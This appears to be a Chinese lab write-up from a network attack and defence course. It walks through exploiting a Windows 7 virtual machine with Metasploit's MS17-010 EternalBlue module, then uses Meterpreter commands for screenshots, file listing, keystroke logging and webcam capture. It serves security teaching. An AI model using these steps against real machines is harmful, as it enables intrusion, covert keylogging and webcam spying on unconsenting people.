admin 管理员组

文章数量: 887021

一、实验目的

理解Windows操作系统的安全体系结构与机制,掌握Windows远程安全攻防技术,掌握Windows操作系统网络服务漏洞攻击过程,并学习如何利用metasploit对Windows操作系统进行简单的攻击及提权。

二、实验环境

攻击端靶机
kaliwindows7(64位)
192.168.1.10192.168.1.6

三、实验步骤

利用nmap来尝试扫描Windows 7看其是否具有MS17010漏洞并开放

初始化数据库

┌──(root㉿kali)-[~]
└─# msfdb init  //初始化
[+] Starting database
[i] The database appears to be already configured, skipping initialization
 

 打开metasploit

┌──(root㉿kali)-[~]
└─# msfconsole

......

/ \    /\         __                         _   __  /_/ __                  
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \                 
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|                
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_                
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\               
                                                                             

       =[ metasploit v6.2.9-dev                           ]
+ -- --=[ 2230 exploits - 1177 auxiliary - 398 post       ]
+ -- --=[ 867 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Use sessions -1 to interact with the 
last opened session
 

 利用msf框架中的ms17_010_eternalblue脚本攻击Windows 7。

 远程获取Windows 7的桌面截图

 远程获取Windows 7的文件目录

远程记录Windows 7的键盘击键记录

1.输入keyscan_start启动

2.在win7中打开的text文件中输入任意内容

3.在kali终端输入 keyscan_dump 即可获取键盘监听到的内容

4.输入 keyscan_stop 停止

 

  在windows7中按win+R进入运行,输入“notepad"打开记事本

 

 

 keyboard_send  xxx发送目标文件到window7中

 

 利用meterpreter中的Webcan_stream获取Windows 7的摄像头画面(需事先将笔记本摄像头连接至虚拟机Win7上)

打开windows7的摄像头,每个电脑的摄像头名称都不一样

webcam_list

webcam_snap

webcan_stream

本文标签: 漏洞 网络

版权声明:本文标题:《网络攻击与防御》ms17-010漏洞(3) 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.freenas.com.cn/jishu/1725012723h849499.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。